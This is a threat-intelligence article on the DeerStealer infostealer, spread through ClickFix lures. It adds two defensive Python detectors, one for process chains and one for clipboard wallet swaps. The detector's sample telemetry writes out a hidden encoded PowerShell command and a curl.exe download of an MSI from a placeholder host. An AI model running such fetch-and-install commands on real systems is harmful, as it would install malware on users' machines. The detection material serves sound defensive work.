eSentire’s Threat Response Unit (TRU) has observed a notable increase in campaigns that abuse the Windows Run prompt to deliver DeerStealer, an advanced information-stealing malware, via carefully orchestrated attack chains.
These incidents often begin with the ClickFix technique, wherein users are lured to a phishing page that instructs them to execute a malicious command directly in the Windows Run dialog (“Win+R”), bypassing traditional endpoint protections.
Threat Actors Leverage ClickFix
The typical attack sequence commences when the victim, redirected from a phishing site, is prompted to run an encoded PowerShell command.

This script utilizes the Windows LOLBin curl.exe to retrieve a malicious Microsoft Installer (now.msi) from a remote server.
Once executed via msiexec.exe, the MSI package drops several files into the C:\ProgramData directory and launches a signed COMODO Internet Security binary that is abused for DLL sideloading.
The legitimate binary (EngineX_Co64.exe) loads a malicious, unsigned cmdres.dll from the same directory.
This DLL hijacks the binary’s normal control flow, allowing the next malware stage to be injected and executed without alerting endpoint security.
At the core of this campaign is HijackLoader, a modular loader first identified in 2023, recognized for its use of steganography and encrypted PNGs to conceal configuration data and modules.
Once active, HijackLoader resolves necessary APIs dynamically, decrypts its payload using custom cryptographic routines, and then module-stomps legitimate binaries (such as vssapi.dll and d3d9.dll) to inject additional code and evade detection. The loader finally deploys DeerStealer as the end payload.
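The chain described above (Run prompt, encoded PowerShell, curl.exe fetching an MSI, msiexec.exe installing it, a signed binary loading an unsigned DLL from C:\ProgramData) is exactly the kind of abnormal process ancestry a behavioral detection can key on. The following is an added example, not eSentire’s or the article’s code: it replays constructed process-creation events through a few ancestry rules. The event fields, the sample command lines and the `example.invalid` host are assumptions, not indicators from the report.

```python
"""
Added example (not from the article or eSentire): flag the ClickFix ->
PowerShell -> curl.exe -> msiexec.exe -> DLL-sideload chain in process telemetry.
All events below are constructed; field names are assumptions.
"""
import re
from dataclasses import dataclass, field

@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str                      # executable name, lower-cased
    cmdline: str
    loaded_dlls: list = field(default_factory=list)   # (path, is_signed) pairs

# Constructed sample telemetry. The -enc payload is UTF-16LE "AAA", not a real script.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "powershell.exe", "powershell.exe -w hidden -enc QQBBAEEA"),
    ProcEvent(300, 200, "curl.exe",
              "curl.exe -o C:\\ProgramData\\now.msi https://example.invalid/now.msi"),
    ProcEvent(400, 200, "msiexec.exe", "msiexec.exe /i C:\\ProgramData\\now.msi /qn"),
    ProcEvent(500, 400, "enginex_co64.exe", "C:\\ProgramData\\EngineX_Co64.exe",
              loaded_dlls=[("C:\\ProgramData\\cmdres.dll", False)]),
    # Benign noise: an administrator installing a package from a console.
    ProcEvent(600, 1, "cmd.exe", "cmd.exe"),
    ProcEvent(700, 600, "msiexec.exe", "msiexec.exe /i C:\\Installers\\tool.msi"),
]

ENCODED = re.compile(r"(?i)\s-e(?:nc|ncodedcommand|c)?\s")   # -e / -ec / -enc / -EncodedCommand
HIDDEN = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")

def ancestry(events, pid):
    """Return [self, parent, grandparent, ...] image names for a pid; loop-safe."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid].image)
        pid = by_pid[pid].ppid
    return chain

def detect(events):
    """Apply the chain rules and return (pid, rule_name) findings in event order."""
    findings = []
    for e in events:
        chain = ancestry(events, e.pid)
        parent = chain[1] if len(chain) > 1 else None
        script_ancestor = "powershell.exe" in chain[1:]
        # Rule 1: PowerShell launched from the shell (Run prompt / explorer) hidden or encoded.
        if e.image == "powershell.exe" and parent == "explorer.exe" and (
                ENCODED.search(e.cmdline) or HIDDEN.search(e.cmdline)):
            findings.append((e.pid, "run_prompt_encoded_powershell"))
        # Rule 2: the curl.exe LOLBin pulling an installer under a script.
        if e.image == "curl.exe" and script_ancestor and re.search(r"(?i)\.msi\b", e.cmdline):
            findings.append((e.pid, "lolbin_msi_download"))
        # Rule 3: msiexec.exe installing from ProgramData with a scripting ancestor.
        if e.image == "msiexec.exe" and script_ancestor and re.search(r"(?i)programdata", e.cmdline):
            findings.append((e.pid, "msiexec_from_script"))
        # Rule 4: any image loading an unsigned DLL from C:\ProgramData (sideload pattern).
        for path, is_signed in e.loaded_dlls:
            if not is_signed and path.lower().startswith("c:\\programdata\\"):
                findings.append((e.pid, "unsigned_dll_sideload"))
    return findings

if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

The benign console-driven msiexec.exe (pid 700) produces no finding because nothing in its ancestry is a scripting host, which is the point of matching on the chain rather than on msiexec.exe alone. On a real host, the Run-dialog step also leaves a corroborating artifact in the user’s RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which can be checked during triage.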
DeerStealer Continues to Evolve
DeerStealer, also referred to as XFiles Spyware in underground forums by its developer “LuciferXfiles,” boasts a robust suite of features.
The malware is capable of harvesting passwords, credit card data, browser cookies, and autofill entries from over 50 browsers, alongside credentials from instant messaging, VPN, email, and gaming clients.

Notably, its cryptocurrency “clipper” function can hijack clipboard data to substitute wallet addresses, supporting over a dozen cryptocurrency formats.
DeerStealer can also target 800+ browser extensions (with custom targeting possible), as well as desktop-based and USB crypto wallets.
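The clipper behaviour described above has a simple observable signature from the defender’s side: a wallet address sitting in the clipboard is replaced, almost immediately and without the user copying anything new, by a different address of the same format. The following is an added example, not code from the article or from DeerStealer: a heuristic that replays constructed clipboard snapshots and flags such swaps. The address formats, the two-second window and every sample address are assumptions made for the demonstration; none of the addresses are real wallets.

```python
"""
Added example (not from the article): detect clipboard wallet-address swaps of the kind
a cryptocurrency clipper produces. Snapshots are (time_ms, clipboard_text) pairs, all
constructed here; the window size is an assumption to tune per environment.
"""
import re

# Coarse syntactic patterns; they identify a format, not a valid checksummed address.
ADDRESS_PATTERNS = {
    "btc_base58": re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$"),
    "btc_bech32": re.compile(r"^bc1[02-9ac-hj-np-z]{25,62}$"),
    "evm_hex": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}

def classify(text):
    """Return the address format name for clipboard text, or None if it is not an address."""
    text = text.strip()
    for name, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text):
            return name
    return None

def detect_swaps(snapshots, window_ms=2000):
    """Flag consecutive snapshots where one address becomes a different address of the
    same format within window_ms. Returns (time_ms, format, old, new) tuples."""
    findings = []
    for (t_prev, prev), (t_cur, cur) in zip(snapshots, snapshots[1:]):
        prev, cur = prev.strip(), cur.strip()
        fmt = classify(prev)
        if fmt is None or classify(cur) != fmt or prev == cur:
            continue
        if t_cur - t_prev <= window_ms:
            findings.append((t_cur, fmt, prev, cur))
    return findings

# Constructed clipboard history (all addresses are placeholders, not real wallets).
SAMPLE_SNAPSHOTS = [
    (0, "meeting notes for tuesday"),
    (1000, "0x1111111111111111111111111111111111111111"),   # user copies their own address
    (1150, "0x2222222222222222222222222222222222222222"),   # replaced 150 ms later: suspicious
    (9000, "bc1" + "q" * 38),
    (15000, "bc1" + "z" * 38),                                # 6 s apart: ordinary re-copy, not flagged
]

if __name__ == "__main__":
    for t, fmt, old, new in detect_swaps(SAMPLE_SNAPSHOTS):
        print(f"{t} ms: {fmt} address {old} silently became {new}")
```

The time window is what separates a clipper from a user who legitimately copies two addresses in a row; in practice the threshold is tuned against normal clipboard telemetry, and a hit is a triage signal to be paired with process and module evidence rather than a verdict on its own.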
The threat actor’s toolkit is continually evolving, with the current version exhibiting enhanced code obfuscation, anti-analysis mechanisms, and a planned roadmap promising macOS support, AI-based automation, and improved remote persistence via hidden VNC modules.
DeerStealer leverages HTTP(S) with custom encryption for C2 communications, implementing hardware- and install-specific fingerprinting to uniquely identify victim systems and streamline exfiltration.
The malware is sold via a tiered subscription model, granting different levels of functionality including custom ClickFix scripts, EV signing, and broader process management to buyers depending on their payment tier (ranging from $200 to $3,000 per month).
Control panels accessible to operators offer extensive management capabilities, including multi-victim oversight, analytics dashboards, and tools for selective file grabbing.
According to the report, security researchers warn that the continued abuse of LOLBins (living-off-the-land binaries) and the direct exploitation of user trust in system dialogs such as the Windows Run prompt render traditional endpoint detection increasingly ineffective.
Defensive strategies should focus on user training, rigorous endpoint monitoring for abnormal process chains, and the adoption of behavioral analytics capable of detecting adversary tradecraft beyond signature-based models.
The rapid pace of DeerStealer’s evolution, backed by professional malware-as-a-service models, underscores the persistent risk posed to both enterprises and individuals alike.